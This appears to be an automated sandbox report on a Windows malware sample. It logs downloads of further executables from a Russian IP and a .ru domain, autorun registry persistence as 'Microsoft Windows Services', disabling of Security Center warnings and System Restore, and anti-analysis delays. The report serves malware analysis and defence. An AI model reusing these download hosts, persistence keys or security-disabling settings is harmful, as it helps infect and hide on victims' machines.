DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: Izu2hJvy.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
Drops a binary and executes it
binary: C:\Windows\5769805074060605\winsvcs.exe
binary: C:\Users\user\AppData\Local\Temp\3635423912.exe
binary: C:\Users\user\AppData\Local\Temp\3527325130.exe
binary: C:\Users\user\AppData\Local\Temp\2658928598.exe
binary: C:\Users\user\AppData\Local\Temp\3843231898.exe
binary: C:\Users\user\AppData\Local\Temp\4089713972.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/m/1.exe
suspicious_request: http://92.63.197.48/m/2.exe
suspicious_request: http://92.63.197.48/m/3.exe
suspicious_request: http://92.63.197.48/m/4.exe
suspicious_request: http://92.63.197.48/m/5.exe
Performs some HTTP requests
url: http://slpsrgpsrhojifdij.ru/1.exe
url: http://slpsrgpsrhojifdij.ru/2.exe
url: http://slpsrgpsrhojifdij.ru/3.exe
url: http://slpsrgpsrhojifdij.ru/4.exe
url: http://slpsrgpsrhojifdij.ru/5.exe
url: http://92.63.197.48/m/1.exe
url: http://92.63.197.48/m/2.exe
url: http://92.63.197.48/m/3.exe
url: http://92.63.197.48/m/4.exe
url: http://92.63.197.48/m/5.exe
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 6.83, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00019c00, virtual_size: 0x00019a10
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: 2658928598.exe (2628) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\5769805074060605\winsvcs.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\5769805074060605\winsvcs.exe
Creates a hidden or system file
file: C:\Windows\5769805074060605
file: C:\Windows\5769805074060605\winsvcs.exe
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\5769805074060605\winsvcs.exe
Attempts to disable System Restore
Attempts to modify or disable Security Center warnings

Hosts

Direct  IP             Country Name
N       92.63.197.48   Russian Federation
Y       8.8.8.8        United States

DNS

Name                   Response         Post-Analysis Lookup
slpsrgpsrhojifdij.ru   A 92.63.197.48

Summary

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe
C:\Windows\5769805074060605
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
C:\Windows\5769805074060605\msvcr100.dll
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\2658928598.exe
C:\Users\user\AppData\Local\Temp\3635423912.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\3843231898.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2658928598.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4089713972.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3527325130.exe
C:\Users\user\AppData\Local\Temp\3527325130.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
\Device\KsecDD
C:\Windows\5769805074060605\winsvcs.exe
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\2658928598.exe
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe
C:\Users\user\AppData\Local\Temp\3527325130.exe
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3635423912.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3843231898.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2658928598.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4089713972.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3527325130.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Module32FirstW
kernel32.dll.GlobalAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.memset
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll._snprintf
msvcrt.dll.fclose
msvcrt.dll.fseek
msvcrt.dll.ftell
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._wfopen
msvcrt.dll._snwprintf
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenUrlW
wininet.dll.InternetOpenW
wininet.dll.InternetOpenUrlA
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathFileExistsW
kernel32.dll.ExitThread
kernel32.dll.CreateFileW
kernel32.dll.GetModuleFileNameW
kernel32.dll.Sleep
kernel32.dll.WriteFile
kernel32.dll.GetTickCount
kernel32.dll.CloseHandle
kernel32.dll.GetLastError
kernel32.dll.CreateMutexA
kernel32.dll.SetFileAttributesW
kernel32.dll.CreateThread
kernel32.dll.GetModuleHandleA
kernel32.dll.GetStartupInfoA
kernel32.dll.DeleteFileW
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.CreateProcessW
kernel32.dll.CreateDirectoryW
kernel32.dll.CopyFileW
advapi32.dll.RegSetValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCreateKeyExA
advapi32.dll.RegQueryValueExW
shell32.dll.ShellExecuteW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\2658928598.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe
608605743
IESQMMUTEX_0_208

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x00407e9d
Reported Checksum 0x00027747
Actual Checksum 0x00027747
Minimum OS Version 5.1
Compile Time 2017-12-13 13:38:41
Import Hash 7fcc8b9d7ca1591b5c9cd6b043691cb9

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00019a10 0x00019c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.83
.data 0x0001b000 0x0001fba8 0x00005e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.87
.mysec3 0x0003b000 0x00000005 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.mysec 0x0003c000 0x0000100a 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 0.00
.mysec10 0x0003e000 0x00000064 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x0003f000 0x00001d62 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.81
.reloc 0x00041000 0x00000ece 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.91

Imports

Library KERNEL32.dll:
0x401000 LocalFree
0x401004 GetLastError
0x401008 AddAtomW
0x401010 ExitProcess
0x401014 AddAtomA
0x401018 SetLastError
0x401020 GetStartupInfoA
0x401024 VirtualProtect
0x401028 GetProcAddress
0x40102c LoadLibraryA
0x401030 GetACP
0x401034 GlobalMemoryStatus
0x401038 GetCPInfo
0x40103c GetSystemTimes
0x401044 GetTickCount
0x401048 GetModuleHandleW
0x40104c EnumSystemLocalesA
0x401050 GetLocaleInfoA
0x401054 GetCommandLineA
0x401058 HeapSetInformation
0x40105c GetStartupInfoW
0x401064 EncodePointer
0x401068 DecodePointer
0x40106c HeapFree
0x401070 TlsAlloc
0x401074 TlsGetValue
0x401078 TlsSetValue
0x40107c TlsFree
0x401084 GetCurrentThreadId
0x40108c GetCurrentThread
0x401094 WriteFile
0x401098 GetStdHandle
0x40109c GetModuleFileNameW
0x4010a0 GetModuleFileNameA
0x4010a8 WideCharToMultiByte
0x4010b0 SetHandleCount
0x4010b8 GetFileType
0x4010c0 HeapCreate
0x4010c4 HeapDestroy
0x4010cc GetCurrentProcessId
0x4010d4 RaiseException
0x4010d8 GetOEMCP
0x4010dc IsValidCodePage
0x4010e4 IsDebuggerPresent
0x4010e8 TerminateProcess
0x4010ec GetCurrentProcess
0x4010f4 FatalAppExitA
0x4010fc Sleep
0x401104 FreeLibrary
0x401108 InterlockedExchange
0x40110c LoadLibraryW
0x401110 GetLocaleInfoW
0x401114 RtlUnwind
0x401118 LCMapStringW
0x40111c MultiByteToWideChar
0x401120 GetStringTypeW
0x401124 HeapAlloc
0x401128 HeapReAlloc
0x40112c HeapSize
0x401130 GetUserDefaultLCID
0x401134 IsValidLocale
Library USER32.dll:
0x40113c PeekMessageA

.text
`.data
.mysec3
.mysec
`.mysec10d
.rsrc
@.reloc
GlobalAlloc
kernel32.dll
@Module32FirstW
CreateToolhelp32Snapshot
floor
exp10
?acos
log10
e+000
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
_nextafter
_logb
frexp
_hypot
_cabs
ldexp
atan2
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SystemFunction036
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
1#QNAN
1#INF
1#IND
1#SNAN
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
LocalFree
GetLastError
AddAtomW
GetCurrentDirectoryA
ExitProcess
AddAtomA
SetLastError
GetProcessShutdownParameters
GetStartupInfoA
VirtualProtect
GetProcAddress
LoadLibraryA
GetACP
GlobalMemoryStatus
GetCPInfo
GetSystemTimes
FillConsoleOutputCharacterW
GetTickCount
GetModuleHandleW
KERNEL32.dll
PeekMessageA
USER32.dll
GetCommandLineA
HeapSetInformation
GetStartupInfoW
IsProcessorFeaturePresent
EncodePointer
DecodePointer
HeapFree
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
GetCurrentThreadId
InterlockedDecrement
GetCurrentThread
SetUnhandledExceptionFilter
WriteFile
GetStdHandle
GetModuleFileNameW
GetModuleFileNameA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
DeleteCriticalSection
HeapCreate
HeapDestroy
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
RaiseException
GetOEMCP
IsValidCodePage
UnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
LeaveCriticalSection
FatalAppExitA
EnterCriticalSection
Sleep
SetConsoleCtrlHandler
FreeLibrary
InterlockedExchange
LoadLibraryW
GetLocaleInfoW
RtlUnwind
LCMapStringW
MultiByteToWideChar
GetStringTypeW
HeapAlloc
HeapReAlloc
HeapSize
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
dizerafasuma
tevakuvokogumiwubotahutucozame
abcdefghijklmnopqrstuvwxyz
